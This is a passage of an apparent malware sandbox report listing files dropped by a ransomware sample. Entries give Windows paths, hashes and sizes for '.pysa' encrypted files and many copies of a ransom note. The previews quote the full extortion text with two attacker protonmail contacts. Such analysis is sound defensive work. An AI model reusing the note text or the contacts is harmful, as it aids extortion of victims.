                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\CrashReports\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\IconCache.db.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):19456
                  Entropy (8bit):7.9050896878478
                  Encrypted:false
                  SSDEEP:384:jbTTB0GfAQI44Lf/WImTRp1tFs64TyF/n5kmWaLVD3wOz1qf9zwHlUqTkbTzoX:jP+GYQTVI2lNN5km/Ld3Npqf/VTzi
                  MD5:2F64548C4E1A376E3A6D8E614FC84516
                  SHA1:66FCE7D7C38BC4BFF071A61E4CECA46B8D8E5C0A
                  SHA-256:675BB0D6F0705ACAE2A83DCA9541385CEC4B56832CE370AF1558C832082C9623
                  SHA-512:98B6A0387E7597B2446EEB427034AA44AF9FF1654082D8B624AC4BBFA7DD67421869A612B14A202D8D25FC2A761AA4A3434A4C88171BB39A4A06FB21FBC63FAA
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012020093020201001\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\History.IE5\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):50176
                  Entropy (8bit):7.98038749425723
                  Encrypted:false
                  SSDEEP:1536:tbYfI9a5HI6ZUYNLgTbsFAIqzdMPZsLjp:JWMae6ZvEdMPZsLN
                  MD5:9EEB080DF7D2C462772A574C76418D0C
                  SHA1:B073ABFC72B9A7AB8B9296F35528028329E40622
                  SHA-256:8E8F45E15EACF905271A1054AD2A6597D9688FADB1931864B877BAB609469FE9
                  SHA-512:BF2CA6566EBB68CE08FCFB61552F90C135B0123783BF83849FCB11946D4F1BE43584EAF36CE78A120541BD85F297E8A766347E47F6F496857ACCAFB83ED743AA
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994922169433915
                  Encrypted:true
                  SSDEEP:1536:71nvKOV4c4lE2zgvVskYgAKMDMWXLy/UJIdY/JNc7Xs/CuboShAXcUSMb1dHFm3Q:NKx2CVRAWX+/U+dY/Ecboo8dHw3cya7
                  MD5:316CCF39796C9097B3BC6767F4ABD5B7
                  SHA1:04A67360896030365F8F699FAE42B7F6036BF63F
                  SHA-256:B4654798EDA338D1E7BA42D094E36F39C7E2F90C27EB826BDA4D5EC99395F19B
                  SHA-512:E605428F088CB326AE463F603EF70F4398E9871418825AE6E16337DB84EEE34859A7ABF1DCBB5DB61BC9643279A9521A8F157672B6F89F5F919CF7BEA3DA7D2E
                  Malicious:true
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\user\AppData\Local\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\user\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
